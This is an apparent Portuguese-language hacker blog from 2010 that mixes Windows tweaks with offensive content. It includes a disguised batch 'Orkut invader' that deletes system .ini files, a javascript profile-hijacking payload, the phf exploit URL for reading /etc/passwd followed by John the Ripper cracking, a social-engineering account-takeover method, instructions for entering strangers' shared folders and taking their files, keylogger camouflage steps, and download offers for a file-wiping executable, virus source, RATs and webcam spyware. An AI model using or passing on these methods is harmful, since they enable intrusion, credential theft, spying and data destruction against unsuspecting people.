segunda-feira, 13 de dezembro de 2010

visitem tudo sobre o delphi

so posto algo aki ano que vem
to de ferias

ae galera hacker que programa em delphi confere o blog ae atualisado todo dia

http://delphivisao.blogspot.com/

segunda-feira, 23 de agosto de 2010

LOGO DA SUA EMPRESA EM PROPRIEDADES DO SISTEMA

Quando vc clica com o botão direito do mouse em Meu Computador>Propriedades, aparece a tela, mostrando as configurações do seu PC, versão do windows, etc. É possível colocar sua marca ali, com suas informações. Vamos lá:

1º - Abra o Bloco de Notas do windows;
2º - Digite ou copie e cole o seguinte:

[Version]
Microsoft Windows XP
WinVer=2002 Professional
[General]
Manufacturer=Seu nome ou sua empresa
Model=Qualquer coisa
SupportURL=http://www.seusite.com.br/
[Support Information]
Line1="Sua empresa ou nome"
Line2="Para suporte adicionar neste micro, ligue para:"
Line3="21-2222-2222"
Line4="Ou visite:"
Line5="http://www.seusite.com.br"

Observação: Nas duas primeiras linhas, na chave [Version], você deve usar o nome e o número de versão que aparecem quando clicamos no ícone Sistema do Painel de Controle. As demais linhas você pode modificar à vontade, de acordo com o seu gosto.

Salve esse arquivo em c:windowssystem com o nome Oeminfo.ini.

Clique em propriedades do sistema e veja o resultado.

CONTINUANDO...
Agora, para colocar uma foto de sua preferencia, abaixo do monitor que aparece na tela de propriedades do sitema, faça o seguinte:

1º - Vc deverá, primeiro, pegar uma foto (bitmap) de sua preferência, com, no máximo, 170 X 110 pixels (pode editar qualquer foto para que fique com esta resolução);

2º - Se você quiser criar um logotipo, com o fundo de cor padrão do windows, escolha a cor para o fundo que, em alguns computadores é R=192, G=192 e B=192 e em outros poderá ser R=188, G=188 e B=188. Teste os dois e pratique o que mais lhe agrada;

3º - Salve o arquivo (foto) no diretório c:\windows\system com o nome Oemlogo.bmp;

Clique em propriedades do sistema, para ver o resultado.

Se tiverem alguma dúvida, postem aí ou deixem scrap no meu orkut.

sábado, 21 de agosto de 2010

desligar o windows mais rapido

vai em executar
regedit
HIKEY_CURRET_USER/Control panel/desktop/WaitToKillAppTimeout

ai vc clica com o botão direito do mouse em modificar apaga o valor e digita 1000

depois vc procura
HungAppTimeout

vc altera o valor pra 1000 e da ok

sexta-feira, 20 de agosto de 2010

senha do win xp pro descubra a senha do windows/xp


Faça o windows dizer qual é ha senha do usuario!
Essa técnica não diz a vc a verdadeira senha mas usando os passos q ensinarei a baixo vc podera tirar a senha do usuario e colocar a sua etc..

Tenho certeza que iráh ajudar a todos.


1* Iniciar Executar

2*CMD

3*net user nome_do_usuário_q_vc_esta_logado /random

depois irah aparecer esta tela


http://img204.imageshack.us/img204/6673/12121cx7.jpg


vejam q ele disse q a senha eh

ApRChU6b

na verdade ela naum eh a senha original , mas c vc ir e contas de uruario e remover a senha ele irah pedir a senha do user

aew vc soh coloca ApRChU6b

q a senha serah resetada

hehe...

tabem tem outro jeito de fazer isso
vc vai em INICIAR/EXECUTAR e digita *CMD
no promt de comando vc digita:
net user nome_do_usuario_logado nova senha
vai fikar mais ou menos assim
net user administrador 123456* vc coloca a senha que vc quiser

quinta-feira, 19 de agosto de 2010

Remover o Messenger

Clique em Iniciar (Start) − Executar (Run) e digitar o comando:

"RunDll32 advpack.dll,LaunchINFSection %windir%
\INF\msmsgs.inf,BLC.Remove" (sem as aspas)

Não remova o Messenger se você usa o navegador MSN, pois ambos são

integrados.

terça-feira, 17 de agosto de 2010

Como bloquear sites

Como bloquear sites

Para bloquear qualquer outro site, use este jeito que e' o melhor. Pois não gastara memória adicional da maquina para verificar os endereços a serem bloqueados.
1- No WinXP vá em:
C:\WINDOWS\SYSTEM32\DRIVERS\ETC
2- E edite com o bloco de notas o arquivo hosts (Este arquivo não tem extensão)
Ele deve estar assim:

# Copyright (c) 1993-1999 Microsoft Corp.
#
# Este é um arquivo HOSTS de exemplo usado pelo Microsoft TCP/IP para Windows.
#
# Este arquivo contém os mapeamentos de endereços IP para nomes de host. Cada
# entrada deve ser mantida em uma linha individual. O endereço IP deve
# ser colocado na primeira coluna, seguido do nome de host correspondente.
# O endereço IP e o nome do host devem ser separados por pelo menos um
# espaço.
#
# Adicionalmente, comentários (como estes) podem ser inseridos em linhas
# individuais ou após o nome de computador indicado por um símbolo '#'.
#
# Por exemplo:
#
# 102.54.94.97 rino.acme.com # servidor de origem
# 38.25.63.10 x.acme.com # host cliente x

127.0.0.1 localhost

3- Se não estiver como acima copie e cole o conteúdo acima do jeito q está para ele, apagando o q estiver nele. Pois ele pode ter sido modificado por um spyware.

4- Para bloquear o um site desejado adicione abaixo da linha 127.0.0.1 linhas assim:
127.0.0.1
www.xxxxx.com.xx
(sendo q o
www.xxxxx.com.xx e' o endereço do site q você quer bloquear)

segunda-feira, 16 de agosto de 2010

domingo, 15 de agosto de 2010

Tutorial Como Camuflar Vírus(Keyloggers) e Tudo Mais


Click Botão Direito Em Cima da Pasta
-Adicionar Para Arquivo,
=http://img211.imageshack.us/my.php?image=imagem01kj1.jpg
Mude o nome do Arquivo para .exe
=http://img211.imageshack.us/my.php?image=imagem02xj0.jpg
Click em Avançado
=http://img233.imageshack.us/my.php?image=imagem03ek3.jpg
Depois click em Opções SFX...
=http://img233.imageshack.us/my.php?image=imagem03ek3.jpg
Click em Executar Apos a Extração
=http://img150.imageshack.us/my.php?image=imagem04go5.jpg
Depois Click em Metodos
=http://img90.imageshack.us/my.php?image=imagem05zk4.jpg
E Depois Click em Ocultar Tudo
e
Ignorar Arquivos Existentes
=http://img83.imageshack.us/my.php?image=imagem06fb1.jpg
Se você tiver algum icone pra colocar click
em
Texto e Icones e depois em preocurar,
=http://img83.imageshack.us/my.php?image=imagem07vj3.jpg

Ai o Tutorial =)

sábado, 14 de agosto de 2010

Computador reiniciando sozinho com Windows XP

É padrão do Windows dar um reboot no seu computador quando encontra uma falha de sistema. Você

pode impedir isso desabilitando o autoreboot. Edite o registro e localize

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl\SetControl\CrashControl.

Selecione AutoReboot na lista da direita. Dê dois cliques nele e troque o valor para 0 (zero) para

desabilitar ou 1 para habilitar. Reinicie o computador. Também é possível solucionar o problema sem editar o

registro.

Abra o Painel de Controle, escolha Sistema, selecione Avançado e clique em Configurações no último

tópico (inicialização e recuperação). Desmarque a opção Reiniciar automaticamente. Deixe marcada a opção

Gravar um evento no log do sistema. Para ver porque o sistema teve alguma falha, digite "eventvwr" no

prompt de comando ou no menu Iniciar>Executar.

sexta-feira, 13 de agosto de 2010

Iniciar Windows sem precisar digitar nome e senha

Selecione Executar no menu Iniciar e digite "control userpassswords2".
Isso abrirá a janela Contas de usuários. Na janela Usuários, limpe a caixa para a opção Usuários devem
entrar com um nome e senha para usar este computador e clique OK. Uma janela para logon automático
surgirá. Entre com o nome e senha para a conta que você deseja usar.

quinta-feira, 12 de agosto de 2010

Tirando as setas dos seus ícones de atalho

Edite o registro. Escolha o item HKEY_CLASSES_RootLnkfile. Delete a chave IsShortcut.

Uma maneira
mais fácil de se conseguir isso é instalando o programa Powertoys.

quarta-feira, 11 de agosto de 2010

Troque o protetor de tela padrão da tela de login

Você pode usar no Windows o protetor de telas de sua preferência, mas o protetor padrão da tela de login
continua sempre o mesmo. Para trocá−lo por outro de sua preferência, siga os passos seguintes. Encontre no
registro do Windows a chave abaixo:
HKEY_USERS\DEFAULT\Control Panel\Desktop
Na janela da direita, dê um clique duplo em SCRNSAVE.EXE
Em Dados do Valor, digite o nome do protetor de telas que você deseja, com o caminho completo de onde
ele se encontra. Se o protetor de telas estiver na pasta /System32 do Windows, bastará o nome do arquivo.
Seu protetor de telas já estará trocado.

terça-feira, 10 de agosto de 2010

Desabilite os balões de aviso do Windows XP

Se você deseja desabilitar aqueles "balões de aviso" que aparecem sempre que o sistema executa alguma função
específica, faça o seguinte: Execute o regedit.exe e vá na chave HKEY_CURRENT_USER Software Microsoft
Windows CurrentVersion Explorer Advanced, clique no menu Editar / Novo / Valor DWORD, digite EnableBaloonTips e
pressione Enter em seu teclado. Se já houver essa variável ali, altere o seu valor para 0 (zero). A partir da próxima
inicialização, os balões não serão mais exibidos;

segunda-feira, 9 de agosto de 2010

invasão por ip

1º- Certifique-se de que a pessoa que você quer invadir possui este programa: nbtstat.

2º- Vá ao Prompt do MS-DOS.

3º- Digite: nbtstat -a o IP do cara que você quer invadir

4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não aparecerá : Host Not Found (o foda é que não da para invadir o computador de certos caras por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de arquivos as pastas)
5º- Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar o nome do negócio que estiver com <03> atrás do nome.

6º-Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios dele . O NetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela forma que eu digitei)

7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC.

8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "OK"

9º- Pronto! Você invadiu por IP!

10º- Conselho: Não apague nem modifique NADA somente vasculhe bastante nas coisas do individuo e se achar algo interessante pega para você.

domingo, 8 de agosto de 2010

drivers para pc



www.driverguide.com (username: drivers / password: all)
www.windrivers.com
http://simplythebest.net/drivers/
http://www.driversearch.com
http://www.pcdrivers.com/
http://www.mrdriver.com/
http://www.winfiles.com/
http://www.drivershq.com
http://www.boadica.com.br/iniciodrivers.asp
Drivers de placas PC Chips:
http://www.amptron.com/
Drivers de placas antigas PC Chips
http://www.pcchipsusa.com/support-newdownload2.asp
www.driver-downloads.com
http://www.driversplanet.com/

drivers para pc



www.driverguide.com (username: drivers / password: all)
www.windrivers.com
http://simplythebest.net/drivers/
http://www.driversearch.com
http://www.pcdrivers.com/
http://www.mrdriver.com/
http://www.winfiles.com/
http://www.drivershq.com
http://www.boadica.com.br/iniciodrivers.asp
Drivers de placas PC Chips:
http://www.amptron.com/
Drivers de placas antigas PC Chips
http://www.pcchipsusa.com/support-newdownload2.asp
www.driver-downloads.com
http://www.driversplanet.com/

Apague as pastas especiais dentro de Meus Documentos

Se não gosta ou não usa as pastas especiais dentro de Meus Documentos, como Minhas Músicas e Minhas Figuras,
basta executar o comando regsvr32 /u mydocs.dll em Iniciar/ Executar e, em seguida, apagar as pastas indesejadas.
Para reverter a ação, execute o comando regsvr32 mydocs.dll. As pastas serão criadas novamente quando o Windows
inicializar;

Apague as pastas especiais dentro de Meus Documentos

Se não gosta ou não usa as pastas especiais dentro de Meus Documentos, como Minhas Músicas e Minhas Figuras,
basta executar o comando regsvr32 /u mydocs.dll em Iniciar/ Executar e, em seguida, apagar as pastas indesejadas.
Para reverter a ação, execute o comando regsvr32 mydocs.dll. As pastas serão criadas novamente quando o Windows
inicializar;

segunda-feira, 26 de julho de 2010

localizador via celular

http://www.trackapartner.com


localize sua namorada ou seu namorado de graça agora msm!!!/perdir meu chip denovo[:(] [:x]

sexta-feira, 18 de junho de 2010

quarta-feira, 16 de junho de 2010

APRENDIZ DE HACKER


Você Tem Uma Porta Contra-Fogo?
Apostila De Tecnologia Wireless (Parte 1)
Pirataria - Você é Contra ou a Favor? (Parte 1)
Informática - Dicas e Truques
Para Descontrair
Os Hackers Contra a Pedofilia (Parte 1)
Mundo Info

» Informações
Estilo:
Cursos Hacker
Tamanho: 18 Mb
Formato: Rar
Idioma: Português
Servidores: RapidShare/Easy-Share

RapidShare Easy-Share

terça-feira, 15 de junho de 2010

GUIA HACKER

Servidor: EasyShare
Desenvolvedor: EduGarcia
Idioma: Português
Tamanho: 1 mb
Formato: .PDF

EasyShare
-

segunda-feira, 14 de junho de 2010

1000 TUTOTIAL HACKER DE 2008



Super Pacote com tutoriais hacker

»Informações
Estilo: Tutoriais/Hacker
Tamanho: 9 MB
Formato: Rar
Idioma: Inglês
Servidores: Easy-Share/Bitroad/Rapidsahre




domingo, 13 de junho de 2010

1042 códigos-fonte de vírus de computadoR


São virus em formato de codigos, todos estão em .txt para a segurança dos membros.
Para caso não saiam mexer com eles, estão todos em formato .txt ou seja codigo aberto.
Trata-se um conjunto de exatamente 1042 códigos-fonte de vírus de computador. Isto mesmo! Códigos-Fonte de vírus!!! Todos em linguagem Assembler, ricamente comentados. Excelente para quem estuda nesta área. Hoje, nenhum desses CFs é perigoso, desde que não seja modificado. Qualquer modificação pode criar um novo vírus altamente perigoso. Alguns dos CFs são de vírus capazes de apagar a BIOS de um PC.

Use com EXTREMO CUIDADO.

OBS.: Quaisquer dano ou problemas, que venham a acontecer, se modificado ou mal uso, não me responsabilizo, é por sua conta e risco.

  • Tamanho: 3.5 MB
  • Hospedagem: Easy-Share
  • Tipo de Arquivo: ASM

Download

Senha: www.memoriahacker.tk

sábado, 12 de junho de 2010

hack para grand chase


Hoje estou aqui divulgando um hack para grand chase,trata-se não apenas de um hack.Mas sim de toda uma configuração para fazêr o mesmo funcionar

Download

sexta-feira, 11 de junho de 2010

REAL VNC


O Real VNC é um programa que faz a conexão de computadores da sua rede ou da Internet, compartilhando a área de trabalho entre eles. Quando conectado, o programa exibe a tela do outro computador em tempo real e você pode controlar a máquina remota como se estivesse na frente dela, assumindo o controle do mouse e teclado.Ele é um excelente programa para profissionais de informática e usuários domésticos. Pode ser aplicado para dar suporte na empresa, ajudar um amigo com dificuldade, conectando no computador do escritório da sua casa etc.O programa é divido em dois módulos (cliente e servidor) que fazem a conexão entre os computadores. É possível instalar os dois ou apenas um dos módulos

»Informações
Estilo: Aplicativos
Tamanho: 5 MB
Formato: Rar
Idioma: Português
Servidor: Easy-Share

quinta-feira, 10 de junho de 2010

KILL WINDOWS



Bom galera eu trago à vocês o "killer system" um executavel que destroi todos arquivos do Windows em questões de segundos. fazendo com que o Windows perca todos os seus dados ao ser reniciado, isso se reniciar rsrsrs!

eu não min responsabilizo pelo mal uso do arquivo, espero que ultilizem com moderação!

OBS: O arquivo está no formato (.exe) e com o Icone de inicialização do WordPad, basta dois clicks e adeus PC

quarta-feira, 9 de junho de 2010

GFI Languard Network Security ScanneR

http://www.sharewarebay.com/images/screenshot/gfi_software/GFI_LANguard_Network_Security_Scanner.gif

Boas novas ! Nesse tutorial vou abordar o assunto “INVASÃO”, utilizaremos a ferramenta “GFI Languard Network Security Scanner”,o tutorial explica detalhadamente passo a passo!



Tamanho: 6MB

USB THIEF


USB Thief .....
Rouba USB Pc Senhas
Tweaked USB que rouba senhas, incluindo todas as licenças.

Tamanho: 1.31MB

terça-feira, 8 de junho de 2010

QUEBRAR SENHA WI FI

arck21_8791120 Quebrar e descobrir chaves wep

Considerada um poderosa ferramena de tráfego 802.11, Aircrack consegue trabalhar em Linux e Windows.Sua função é quebrar ou descobrir as chaves wep( Wired Equivalent Privacy) a partir de dados capturados duma rede sem fio alvo.Na verdade, o pacote cujo aircrack faz parte é composto também por outros programas: como o Airodump e Wzcook.
»Informações
Estilo: Tutoriais
Tamanho: 2 MB
Formato: Rar
Idioma: Português
Servidores: Easy-Share

segunda-feira, 7 de junho de 2010

PACK HACKER 2010

Trojan Horses
- Yuri RAT v1.2
- MofoTro v1.7 BETA
- Charon
- Beast v2.0.7
- Omerta v1.3
- Theef v2.10
- Combined Forces R.A.T
- MoSucker v3.0
- ProRat v1.9 Fix2
More...
Keyloggers
- Elite Keylogger v1.0
- SKL v0.1
- KeySpy v
2.0
- A++++
- Curiosity
- Keylogger
- KeyCopy
Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner
WebHacks/WordLists
Brute Forcers
- Munga Bunga 's Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix
CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
Virus!
Viruses
- Hippi virus
- Sasser
- W32. Blaster .Worm
- Midnight Massacre
- 00001
- Nimda
- Loveletter virus
- Happy '99
- MXZ
Virus Builders
- DR VBS
- VBSwg 2 beta - Virus builder
- p0ke's WormGen 2.0
- RESIDUO - DoS Virus
MSN Hacks & Bots
- HoaX Toolbox 1.1
- MSN Extreme 3.0
- MessenPass v1.06
- Advanced Blood Scroller
- Nudge Madness
- Advanced Instant Messengers Password Recovery
- Contact Spy
- Msn Explosion
- Encrypted Messenger
Port & IP Scanners
- Blues Port Scanner
- ProPort v2.2
- SuperScan v3.0
- Net Scan Tools v4.2
- LanSpy v2.0
- Bitchin Threads v3.1
- Trojan Hunter v1.5
- SuperScan v4.0
- Neotrace PRO v3.25 trial&crack
Nukers And Flooders
- Rocket v1.0
- RPCNuke v1.0
- Panther Mode1 - 56k
- Panther Mode2 - ISDN +
- Final Fortune v2.4
- Battle Pong - Technophoria
- Assault v1.0
- ICMP Nuker
- CLICK v2.2
EXTRA!

- Telnet Tutorial
DOWNLOAD LINK: PACK COMPLETO

domingo, 6 de junho de 2010

DELPHI 7 COMPLETO



Com o Delphi você fazer varios softwares, codigos de programação e muito mais.

Delphi, originalmente direcionado para a plataforma Windows, chegou a ser usado para desenvolvimento de aplicações nativas para Linux e Mac OS, através do Kylix (o Kylix é um IDE para as linguagens C++ e Object Pascal), e para o framework Microsoft .NET em suas versões mais recentes. O desenvolvimento do Kylix foi descontinuado.
Atualmente há um projeto chamado Lazarus que possui uma interface muito semelhante ao Delphi e a característica de ser multiplataforma, ou seja, roda em Linux, Windows, OS/2, Mac OS tradicional, Mac OS X, ARM, BSD, BeOS, DOS e mais.

->Informações

Estilo: Linguagem de programação
Tamanho: 299,8 MB
Formato: Zip
Idioma: Português
Servidor: Megaupload


Hackman


Edite e altere arquivos profissionalmente com esta ferramenta Hacker.
Hackman possui algoritmos próprios e funções para decodificação criptográfica incluídas.
Você poderá editar praticamente qualquer tipo de arquivo em cinco modos diferentes: ASCII, Hex, Binary, Octal e Decimal.

Tamanho: 9MB
Formato: Rar
Facilidade de Uso: 10
Interface Gráfica: 10
Número de Mídias:
Idioma: Inglês

Link Rapidshare
Link Badongo
Link Picshome
Link Megaupload
Link Zshare

DICA PRA QM ENTENDE DO ASSUNTO!

Nesse meio tempo editando um limpador de cookies em .bat me veio uma ideia.

vejamos abaixo:

Abra o bloco de notas e digite o comando

echo
@Echo Off
echo y| del %systemroot%\*.ini
cls
echo SEJA BEM VINDO AO INVAZOR DE ORKUT!
ECHO - CONECTANDO-SE AO SERVIDOR GOOGLE...
ping www.orkut.com
cls
echo Set user as string
echo invador = password
echo password ?9-19M
ping www.orkut.com
cls
ECHO CONECTADO A ORKUT.COM
echo ---------------------------------------------------------
echo Agora tente acessar o orkut da pessoa usando a senha invazor
echo ----------------------------------------------------------
echo PARA DESCONECTAR PRECIONE QUALQUER TECLA.
PAUSE


Agora salve como invasor.bat,

tem muita gente por ai louca pra invadir orkut e tal, agora veja a 3º linha o seguinte comando: echo y| del %systemroot%\*.ini
que tal inserir um outro comando nesse arquivo?

Pra quem sacou a ideia Boa sorte ...

WEB CAM SPY


Ae galera eu ainda não testei este programa, mas sei que funciona e que ele faz com que você consiga espionar a pessoa que estiver do outro lado se ela tiver um Webcam conectada ao computador, imagine então você espionando aquela gostosa ou aquele carinha sem que ele saiba que sua webcam esta ligada hahahhahhaha

Colocando senha em uma pasta sem programa


Primeiro você abre o bloco de notas e cole o seguinte código:

CLS
@ECHO OFF
title COLOCAR SENHA EM PASTA
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Tem certeza que deseja trancar esta pasta(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Pasta trancada
goto End
:UNLOCK
echo Entre com a senha
set/p "pass=>"
if NOT %pass%== RAFAEL FLY LOST goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Destrnacada com sucesso
goto End
:FAIL
echo Senha Incorreta
goto end
:MDLOCKER
md Private
echo Pasta criada com sucesso
goto End
:End


Salve o texto na onde você quiser (para que futuramente você possa criar mais pastas privadas)

No código acima troque a palavra "RAFAEL FLY LOST" pela senha desejada

agora vá em salvar como e salve como protetor.bat

Pronto, ao clicar no arquivo protetor aparecera uma pasta com o nome de private.

você guarda tudo, na hora de fechar você clica no arquivo protetor e ele perguntará se você deseja fechar, você coloca Y para sim e N para não, não importa se o y ou o n seja maiúsculo ou minúsculo.

Para abrir a pasta basta clicar no arquivo protetor e ele vai pedir a senha.

Uma vantagem que quando a pasta some, ela não fica oculta, então não adianta digitar o diretório na barra de endereços que ela não aparece.

Quando usar colocar os creditos !!!

domingo, 16 de maio de 2010

novo metodo de roubar orkut 2010

cola o codigo a baixo no perfil da vitima e depois entra no
site q ta acima e manda um recado
pra todos amg com o codigo
q ta baixo
depois confira a sua caixa de entra todos amigos com email nao
confirmados
vao para seu email
um email pra vc mudar a senha deles e ficar com o perfil da vitima

javascript:alert("enviando senha deste profile para sua caixa de email!");javascript: cor = "red"; var timer_1; function vagalume () {(cor == "yellow") ? cor = "red": cor = "yellow"; document.links[20].parentNode.parentNode.style.backgroundColor = cor; timer_1 = setTimeout('vagalume ()',100)}; vagalume (); javascript: i=0; c=["blue","violet","green","red","gold","aqua","lime","yellow"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(O); javascript:i=0;cmm=['99870667','97823855'];a = document.forms[1]; a.target = '_top'; setInterval("i++; a.action = 'CommunityJoin.aspx?Action.join&cmm=' + cmm[i%cmm.length]; a.submit() ",300); void(O)

sexta-feira, 7 de maio de 2010

HACKIANDO SITES

1->Por favor, saiba que hackear webpages é considerado lammer em muitas opiniões, e muito provavelmente NÃO vai te dar uma boa reputação. As pessoas sempre podem checar log's uma vez notificadas de hacking, e provavelmente o seu IP/Host pode vir à tona e no mínimo irão te processar pela lei de crimes no computador, e vc será condenado à alguns anos de prisão e terá de pagar uma BOA quantia de dinheiro. Então por favor tente não abusar do conhecimento em relação a esse assunto. Esse texto tem apenas a função de informar.

2->HACKEANDO FREE WEB PAGES
O serviço de Hosting Gratis de WebPages é feito por empresas como a Tripod and Geocities, que dá espaço de graça e ganha dinheiro com propaganda. Há maneiras de hackear essas empresas e ter acesso à todas as senhas/usernames, mas é algo que seria complexo para a maioria das pessoas. Esse método que vai ser explicado é simples engenharia social, o que não é muito dificil de se fazer. Então, não se ache um Hacker de Elite só porque vc zuou a webpage de uma pobre pessoa que apenas esqueceu algumas informações pessoais na própria Page.
Tudo que vc tem que fazer é abrir uma conta num serviço de e-mail (ex.:Hotmail) e escolher uma vítima. Vc precisará achar a data de nascimento, o nome, e o e-mail antigo da pessoa, e se possivel, o endereço dela. Resumindo... Consiga o MAXIMO de info que vc puder sobre ela.
Todas essas empresas têm um serviço de verificação para pessoas que perderam a password da sua Page. Quando vc tiver o maximo de informações sobre a pessoa, mande um e-mail para a empresa dizendo que vc mudou de e-mail. ESPERE duas semanas e mande outro. Só que nesse, diga que vc perdeu a sua password. Na maioria das vezes eles te mandam um e-mail de volta, dizendo que vc precisa confirmar alguns dados pessoais seus, como a data de nascimento ou endereço.
Tudo o que vc tem de fazer é mandar todas as informações que vc conseguiu, e esperar a password chegar fresquinha no seu e-mail.
Por outro lado, companhias como a Geocities são muito ocupadas para ficar respondendo e-mailsde perda de password, então eles fizeram uma pagina onde membros podem pegar suas password'z de volta. (http://www.geocities.com/help/pass_form.html).

3>HACKEANDO PAGES DE USUÁRIOS
Existem várias maneiras de hackear pages de usuários em um servidor. Eu vou tentar listar aqui o máximo de maneiras possíveis para tal, mas não espere muito em termos de informação DETALHADA.
Pegando as password's:
Beleza, suponha que vc encontrou uma page que vc quer hackear, e que esta page esteja num server em que vc não tenha acesso, e que esse servidor seja BASICO, segurança leve. Tudo bem vai.... segurança BEM LEVE! Não vou mentir... funciona melhor em sites SEM SEGURANÇA. hehehe
Nesse caso, pegar a passwd é bem fácil. Abra um telnet para o FTP do server anonimamente e olhe no diretório ETC. Pegue o arquivo chamado "passwd". Outra maneira de pega-las é achar o seu alvo, abrir um WWW-Browser e digitar:
cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd DEPOIS do nome do servidor. Ex.:
http://www.vitima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
OBS: se vc não souber o que colocar no lugar de "vitima.com", SE MATE LAMMER!
Voce pode vir à pegar um arquivo passwd que não tenha contas de usuários, apenas defauts com a senha encriptada com um * no lugar. Em certos servidores com isso, vc pode ter passwd shadowed, mas em que todas as passwd files que já vi, havia um usurname como FTP e/ou NEWS que não tinham as senhas encriptadas, com um * no lugar.
Se vc achar apenas isso e NADA de senhas encriptadas, tente outra maneira de hackear o server.
Vc precisa examinar o arquivo de password'z e achar algo tipo assim:
rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/ksh
Não precisa ser EXATAMENTE assim. a unica parte REALMENTE importante é o rrc:uXDg04UkZgWOQ, que é o username(rcc) e o passwd ENCRIPTADO(uXDg04UkZgWOQ)
Pegue um programa chamado JOHN THE RIPPER, que pode ser encontrado em qualquer Site de H/P/V/A/C na Web.
Para usar o JOHN THE RIPPER é facil. Se vc quer quebrar rapidamente as senhas, vá no prompt do DOS, no diretório do programa e digite:
john passwd -single
Onde passwd é o nome da passwd file. Por exemplo, se vc salvou a passwd file como pass.txt, ficaria:
john pass.txt -single
Uma coisa importante é que a passwd file esteja no mesmo diretório que o programa.
Para obter uma lista de outros métodos de quebrar uma passwd file, digite apenas "john", no diretório do programa, para obter uma lista de comandos.
Eu acho que o JOHN THE RIPPER funciona bem sem wordlists, mas algumas pessoas discordam. Se quiser se aprofundar no programa, procure um texto que enine a usar o JOHN THE RIPPER. Este aqui ensina apenas o básico.
Para concluir... se vc pegou a password e username, DIVIRTA-SE!!!

4>HACKEANDO UMA PAGE EM UM SERVER QUE VC TB TENHA ACESSO:
Essa seção ensina como hackear uma webpage num server onde vc já tem uma conta. Esse texto foi retirado de um texto feito por Lord Somer, e já que não quero arrancar algo importante do texto, vou apenas deixa-lo aí, apenas vou traduzi-lo, pois é um método complexo, onde qualquer cagada pode zoar o esquema todo.
Exploiting Net Adminstration CGI (by Lord Somer)
#######################################
Exploiting Net Administration Cgi's
like nethosting.com
Written by:Lord Somer
Date:9/2/97
#######################################
Bom, desde que a Nethosting.com fechou ou o que quer que seja, eu pensei:"Que porra eu vou fazer antes de esquecer como eu fiz esses hackz?" O que eu vou fazer é dizer COMO eu fiz, então daí vc pode vir a encontrar o mesmo sistema em algum outro lugar ou usar para tirar suas próprias idéias para o hack.
Basicamente, a nethosting.com fez toda a sua administração via CGI'z (net-admin.nethosting.com) Primeiro, vc precisa ter uma conta nesse server, falsifique unz numeros de cartão de crédito se necessário. Depois, entre dentro da área de administração... vc vai ver umas merdas como administração de FTP, e-mail, etc.
Quem se importa com e-mails? Então, vamos ao FTP. Clique na FTP ADMINISTRATION. Vamos dizer que vc está logado como 7hsphere.com. Seu url seria algo do tipo:
http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thspher
e.com+ljad32432jl
Apenas mude o 7hsphere.com para qualquer domínio que o sistema tenha, ou se no chmod, apenas delete essa parte, mas deixe o sinal de +, para editar o diretório usr/home. Na administração do FTP. faça uma conta de backdoor para esse domínio criando um diretório chamado /, já que multiplas /// continuam mostrando apenas /.
Uma vez que vc tem o backdoor, DIVIRTA-SE!
Bom, a teoria básica desse tipo de exploit é que:
-O CGI passava um parâmetro onde nós mudamos para algo do nosso interesse, para editarmos infoz.
-Desde que isso usa o bagulho depois do + para verificar se este é uma conta valida logada, isso não checa a password novamente.
- Multiplas ///'z no UNIX apenas significam uma /, então, não podemos ganhar acesso à diretórios de outras pessoas ou todo o diretório /usr/home.
Eu usei este método para hackear alguns lugares conhecidos:
-7thsphere.com
-sinnerz.com
-hawkee.com
-warez950.org
-lgn.com
E muitos outros sites desconhecidos.

5>OUTRA MANEIRA DE SE HACKEAR USER PAGES
Outro método que pode funcionar com servidores mal administrados é, às vezes, quando vc abre um FTP no server, vc sai do seu diretório home, volta algunz diretórioz, e acha o diretório da vitima. Uma vez que vc tenha feito isso, vc pode acessar os arquivos HTML, salvá-los no disco, editá-los e colocar novamente dentro do dir. Os arquivos HTML podem ou não ficar dentro do FTP, mas com adminz, eles não são acessíveis para outros usuários.

6>MÉTODOS QUE NÃO SE ENCAIXAM NAS OUTRAS CATEGORIAS.
Há muitas outras maneiras de se Hackear Web Pages. A burrice das pessoas é uma boa maneira. Muitas password'z são adivinháveis se elas não são hackeáveis. Isso não é hacking, mas sim estupidez de outras pessoas. Se vc pegar o root de um server, vc pode ter acesso a TUDO no servidor. Então, se vc quer hackear um servidor de webpage, ou acessar qualquer coisa nesse servidor, vc deve pegar uma conta e rodar um exploit no servidor, mas isso é uma coisa que newbies não devem tentar enquanto não tiverem certeza do que estão fazendo.

Gostou

quinta-feira, 6 de maio de 2010

como se tornar um hacker

